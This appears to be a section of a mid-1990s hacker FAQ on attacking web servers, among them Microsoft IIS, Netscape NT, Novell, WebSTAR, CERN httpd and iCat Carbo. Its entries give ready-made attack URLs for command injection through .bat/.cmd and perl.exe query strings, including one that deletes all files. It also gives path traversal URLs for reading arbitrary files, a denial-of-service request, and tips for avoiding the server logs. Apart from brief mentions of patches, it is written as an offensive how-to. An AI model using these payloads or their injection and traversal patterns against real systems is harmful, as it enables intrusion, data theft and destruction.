Fun with Other Web Servers
Section 04: Fun with Other Web Servers
04-1. What are some known vulnerabilities with Microsoft Internet Information Server?
There are a few, and they are deadly. If a site is running Microsoft Internet Information Server v1.0, the default installation leaves the server wide open. The example hack illustrated here assumes that the CGI directory is /scripts, there are no files called pfieffer.bat or pfieffer.cmd in the scripts directory, and the web server links .bat and .cmd files to cmd.exe. Just point your browser this way:
http://www.target.com/scripts/pfieffer.bat?&dir+c:\+?&time
or
http://www.target.com/scripts/pfieffer.cmd?&dir+c:\+?&time
Your browser will ask you to save a document. Start the save, and then click the cancel button to stop the download. The "time" command on the never terminates anyway, so the execution process was never completed. The server treats this as if you made a request and just cancelled, so the entire transaction isn't logged. There will be some info in some of the security logs, but no indication as to the machine the attack came from.
You can also execute a batch file by:
http://www.target.com/scripts/pfieffer.bat?&1STLINE+?&...+?&time
Just expand ... into a series of commands, make the last one the time command, and you can execute a batch file remotely with no logging of who you are. Remember, cancel the download, since the time command will never finish. I leave the commands you send to your own discretion ;-)
This works only if the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
contains
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
If this isn't present then the above hacks will not work, and the attempt will be logged. However it IS present after initial installation.
Note: that was Microsoft Internet Information Server v1.0. Microsoft attempted to patch this problem. And according to the WWW Security FAQ the problem is solved. This is not the case as of June 1, 1996! If the server was downloaded after March 5, 1996 or has the .bat/.cmd patch installed, you can still do a bit of intruding. Let's say test.bat exists in /scripts:
@echo off
echo Content-type: text/plain
echo.
echo Hello World!
Now try this URL:
http://www.target.com/scripts/test.bat+%26dir+%26time+%26pfieffer.exe
The test.bat file must be present in /scripts for this to work, but it does work the same way as the previous methods (cancel the save, etc).
Another problem for IIS versions earlier than 1.0c is that the server is not chrooted. Simply a series of ".." and "../" can lead you to retrieve any file off of the box.
A denial of service vulnerability exists using NT v4, SP1, and IIS v2.0.
Here's how to do it:
- telnet nt.thegnome.com 80 (assuming port 80 for httpd)
- GET ../..
Your fix? Reboot the server. Hopefully for you admins IIS 3.0 will address this concern.
04-2. What are some known vulnerabilities with Netscape's NT Server?
There are a couple.
Netscape does not use the File Manager's extension association, so you cannot use the first .bat/.cmd attack from 04-1 on an NT server running Netscape. But you can try and execute a variation on the second attack. Assuming /cgi-bin is where the scripts are:
http://www.target.com/cgi-bin/test.bat?&dir
This executes test.bat and then gives you a directory listing.
The second one lies in the fact that until recently a Netscape tech note recommended putting PERL.EXE in the /cgi-bin directory. This would allow the site to call perl scripts from within /cgi-bin (remember, Netscape doesn't use the File Manager's extension association), but also allows you to send perl commands directly to the server. My favorite example in the WWW Security FAQ is:
http://www.target.com/cgi-bin/perl.exe?&-e+unlink+%3C*%3E
It erases all files in the current directory. Nasty.
04-3. What about WebSite and Purveyor?
WebSite 1.1b and earlier suffers from the same problems as Netscape does with DOS .bat files. Version 1.1c fixes this problem. WebSite 1.1e had a problem with quoting commands and passing them to a sample CMD file that took advantage of a buffer overflow condition. This was fixed in later releases.
Purveyor Server for NT doesn't seem to have any of these problems.
04-4. Is Novell's IntranetWare web server software vulnerable?
Novell's Web Server had a HUGE bug. The CGI scripts are Basic programs (yes you are about to hack a server using Basic!) and several are included with the server. One in particular, CONVERT.BAS, takes a file and converts it to HTML and then sends it to the user. Here's an example for www.target.com:
http://www.target.com/scripts/convert.bas?readme.txt
The README.TXT file is returned as HTML. Now here's the bug:
http://www.target.com/scripts/convert.bas?../../any_file_on_sys_volume
This is supposedly corrected in the version that ships with Netware 4.11, but a number of sites, including Novell's office in Japan, still have the bug and you can still access any file on volume SYS as a text file.
04-5. What about WebSTAR for the Mac?
Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N to any URL on a WebSTAR server and it will give you info like this:
WebSTAR, Copyright =A91995 Chuck Shotton,
Portions =A91995 StarNine Technologies, Inc. and its Licensors. All rights reserved.
PowerPC (CW) version
totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0, timeout 0, maxMem
1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80, maxTimeout 300,
verboseMessages false, disableLogging false, hideWindow false,
refuseConnections false, upSince
07/11/96:10:48, version 1.2.5(PowerPC (CW))
The latest version should have this fixed. While it doesn't seem very interesting, the connection to get this is not logged, which allows psychotics to use it as a denial-of-service attack.
Why is it even there? It has been speculated that the author had intended to "check out" and see how busy his code was once it was installed.
04-6. Does CERN's httpd have any vulnerabilities?
CERN does access restriction using either IP addresses or hostnames. The pattern for both is value.value.value.value, that is 205.42.*.* or *.spy.spook.gov. Since they use some of the same code in their checking, under certain conditions a hole opens. You could spoof or supply a hostname that matches the IP address mask and allows access.
If the CERN httpd server is a proxy on a gateway machine and you use IP address masks to limit access to the proxy, an attacker could use the proxied service to access internal machines. Since you are allowing port 80 traffic in, your firewall becomes useless.
Admins, a patch should be at from http://softway.com.au/misc/cern.html, and hackers, this is the only proxy I am aware of that does this. It certainly seems possible that other proxy software (and not just web services) might be impacted.
04-7. What is the iCat Carbo Server bug?
iCat Carbo Server is a program used to develop interactive shopping catalogs for the web. Version 3.0.0 has a bug that allows you to look at any file on the server.
Try this type of url:
http://host/carbo.dll?icatcommand=..\..\winnt\creditcards&catalogname=catalog
You get the idea.